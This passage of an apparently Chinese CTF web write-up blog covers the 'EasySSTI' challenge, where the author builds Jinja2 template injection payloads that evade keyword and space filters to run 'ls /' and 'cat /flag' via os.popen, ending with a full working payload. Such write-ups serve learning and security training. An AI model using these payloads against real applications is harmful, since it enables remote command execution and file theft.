                       data-src="https://img2022.cnblogs.com/blog/2933309/202209/2933309-20220916033307544-1063948328.png"
                         width=500
                 >

<p>由此可以用诸如以下的方式构造我们需要的被“过滤”的关键字：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">#构造po=&quot;pop&quot;     #利用dict()|join拼接得到</span><br><span class="line">&#123;% set po=dict(po=a,p=a)|join%&#125;</span><br><span class="line"> </span><br><span class="line">#构造a=(()|select|string|list).pop(24),这里a即下划线_</span><br><span class="line">&#123;% set a=(()|select|string|list)|attr(po)(24)%&#125;</span><br><span class="line"> </span><br><span class="line">#构造ini=&quot;__init__&quot;</span><br><span class="line">&#123;% set ini=(a,a,dict(init=a)|join,a,a)|join()%&#125;</span><br><span class="line"> </span><br><span class="line">#构造glo=&quot;__globals__&quot;</span><br><span class="line">&#123;% set glo=(a,a,dict(globals=a)|join,a,a)|join()%&#125;</span><br><span class="line"> </span><br><span class="line">#构造geti=&quot;__getitem__&quot;</span><br><span class="line">&#123;% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%&#125;</span><br><span class="line"> </span><br><span class="line">#构造built=&quot;__builtins__&quot;</span><br><span class="line">&#123;% set built=(a,a,dict(builtins=a)|join,a,a)|join()%&#125;</span><br><span class="line"> </span><br><span class="line">#构造sub=&quot;__subclasses__&quot;</span><br><span class="line">&#123;% set sub=(a,a,dict(subclasses=a)|join,a,a)|join()%&#125;</span><br><span class="line"></span><br><span class="line">#构造chr()函数调用</span><br><span class="line">&#123;% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%&#125;</span><br><span class="line">&#123;% set chr=x.chr%&#125;</span><br><span class="line"></span><br><span class="line">#构造file=&#x27;/flag&#x27;</span><br><span class="line">&#123;% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%&#125;</span><br></pre></td></tr></table></figure>


<p>回到这一题，因为空格被过滤，可用<code>%0a</code>换行符绕过。命令执行payload构造过程：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set%0apo=dict(po=a,p=a)|join()%&#125;                        #pop</span><br><span class="line">&#123;%set%0aa=(()|select|string|list)|attr(po)(24)%&#125;          #_</span><br><span class="line">&#123;%set%0aglo=(a,a,dict(glo=aa,bals=aa)|join,a,a)|join()%&#125;  #globals</span><br><span class="line">&#123;%set%0ageti=(a,a,dict(ge=aa,titem=aa)|join,a,a)|join()%&#125; #getitem</span><br><span class="line">&#123;%set%0ape=dict(po=aaa,pen=aaa)|join()%&#125;                  #popen</span><br><span class="line">&#123;%set%0are=dict(rea=aaaaa,d=aaaaa)|join()%&#125;               #read</span><br><span class="line">dict(o=a,s=a)|join()                #获取 os</span><br><span class="line">(config|string|list)|attr(po)(279)  #获取  /</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#123;&#123;lipsum|attr(glo)|attr(geti)(dict(o=a,s=a)|join())|attr(pe)(dict(l=a,s=a)|join())|attr(re)()&#125;&#125;</span><br><span class="line">&lt;==&gt;</span><br><span class="line">&#123;&#123;lipsum.__globals__[&#x27;os&#x27;].popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>成功构造payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set%0apo=dict(po=a,p=a)|join()%&#125;&#123;%set%0aa=(()|select|string|list)|attr(po)(24)%&#125;&#123;%set%0aglo=(a,a,dict(glo=aa,bals=aa)|join,a,a)|join()%&#125;&#123;%set%0ageti=(a,a,dict(ge=aa,titem=aa)|join,a,a)|join()%&#125;&#123;%set%0ape=dict(po=aaa,pen=aaa)|join()%&#125;&#123;%set%0are=dict(rea=aaaaa,d=aaaaa)|join()%&#125;&#123;&#123;lipsum|attr(glo)|attr(geti)(dict(o=a,s=a)|join())|attr(pe)(dict(l=a,s=a)|join())|attr(re)()&#125;&#125;</span><br></pre></td></tr></table></figure>

<img    
                       lazyload
                       alt="image"
                       data-src="https://img2022.cnblogs.com/blog/2933309/202209/2933309-20220916165007009-950366739.png"
                        
                 >

<p>修改payload，将<code>ls</code>改为<code>ls /</code>，上述dict拼接办法不能用（也可能是我操作有问题），直接<code>()|select|string|list</code>一个个获取：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">((()|select|string|list)|attr(po)(20),(()|select|string|list)|attr(po)(18),(()|select|string|list)|attr(po)(10),(config|string|list)|attr(po)(279))|join()</span><br></pre></td></tr></table></figure>

<p>发现flag后按照上述办法将命令修改为<code>cat /flag</code>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">((()|select|string|list)|attr(po)(15),(()|select|string|list)|attr(po)(6),(()|select|string|list)|attr(po)(16),(()|select|string|list)|attr(po)(10),(config|string|list)|attr(po)(279),(()|select|string|list)|attr(po)(41),(()|select|string|list)|attr(po)(20),(()|select|string|list)|attr(po)(6),(()|select|string|list)|attr(po)(1))|join()</span><br></pre></td></tr></table></figure>

<p>成功获取FLAG，最后给出最终完整的Payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set%0apo=dict(po=a,p=a)|join()%&#125;&#123;%set%0aa=(()|select|string|list)|attr(po)(24)%&#125;&#123;%set%0aglo=(a,a,dict(glo=aa,bals=aa)|join,a,a)|join()%&#125;&#123;%set%0ageti=(a,a,dict(ge=aa,titem=aa)|join,a,a)|join()%&#125;&#123;%set%0ape=dict(po=aaa,pen=aaa)|join()%&#125;&#123;%set%0are=dict(rea=aaaaa,d=aaaaa)|join()%&#125;&#123;&#123;lipsum|attr(glo)|attr(geti)(dict(o=a,s=a)|join())|attr(pe)(((()|select|string|list)|attr(po)(15),(()|select|string|list)|attr(po)(6),(()|select|string|list)|attr(po)(16),(()|select|string|list)|attr(po)(10),(config|string|list)|attr(po)(279),(()|select|string|list)|attr(po)(41),(()|select|string|list)|attr(po)(20),(()|select|string|list)|attr(po)(6),(()|select|string|list)|attr(po)(1))|join())|attr(re)()&#125;&#125;</span><br></pre></td></tr></table></figure>
                </div>
                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/CTF/">CTF</a>
                                    </li>
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/web/">web</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                            <div class="post-share-container border-box">
    <ul class="share-list-wrap border-box">
        <li class="qq share-item border-box flex-center tooltip"
            data-tooltip-content="分享到 QQ"
        >
            <i class="fa-brands fa-qq"></i>
        </li>
        <li class="wechat share-item border-box flex-center tooltip tooltip-img"
            data-tooltip-content="分享到微信"
            data-tooltip-img-tip="微信扫一扫"
            data-tooltip-img-style="background-color: #fff; top: -10px; padding: 0.6rem 0.6rem 0.1rem 0.6rem;"
        >
            <i class="fa-brands fa-weixin"></i>
        </li>
        <li class="weibo share-item border-box flex-center tooltip"
            data-tooltip-content="分享到微博"
        >
            <i class="fa-brands fa-weibo"></i>
        </li>
    </ul>
</div>

                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2022/12/12/web%E5%9F%BA%E7%A1%80%E5%92%8C%E9%9D%B6%E5%9C%BA%E6%90%AD%E5%BB%BA/"
                                   title="web基础和靶场搭建"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">web基础和靶场搭建</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2022/12/06/2022DASCTF-MAY-%E5%87%BA%E9%A2%98%E4%BA%BA%E6%8C%91%E6%88%98%E8%B5%9B-web/"
                                   title="2022DASCTF MAY 出题人挑战赛 web"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">2022DASCTF MAY 出题人挑战赛 web</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#phpdest"><span class="nav-text">phpdest</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#EasyPHP"><span class="nav-text">EasyPHP</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SimpleRCE"><span class="nav-text">SimpleRCE</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#funny-upload"><span class="nav-text">funny_upload</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#EasySSTI"><span class="nav-text">EasySSTI</span></a></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="border-box website-info-box default">
        
            <div class="copyright-info info-item default">
                &copy;&nbsp;<span>2022</span>&nbsp;-&nbsp;2024
                
                    &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">Latte</a>
                
            </div>

            <div class="theme-info info-item default">
                由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
            </div>

            

            
        

        <div class="count-item info-item default">
            

            

            
        </div>
    </div>
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="tools-list border-box">
        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-toggle-theme-mode flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#phpdest"><span class="nav-text">phpdest</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#EasyPHP"><span class="nav-text">EasyPHP</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SimpleRCE"><span class="nav-text">SimpleRCE</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#funny-upload"><span class="nav-text">funny_upload</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#EasySSTI"><span class="nav-text">EasySSTI</span></a></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>



<!-- common -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/utils.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/header-shrink.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/back2top.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/toggle-theme.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/code-block.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/main.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/libs/anime.min.js"></script>

<!-- local-search -->

    <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/local-search.min.js"></script>


<!-- lazyload -->

    <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/lazyload.min.js"></script>


<div class="">
    
        <!-- post-helper -->
        <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/post/post-helper.min.js"></script>

        <!-- toc -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/post/toc.min.js"></script>
        

        <!-- copyright-info -->
        

        <!-- share -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.1.1/js/post/share.min.js"></script>
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



</body>
</html>
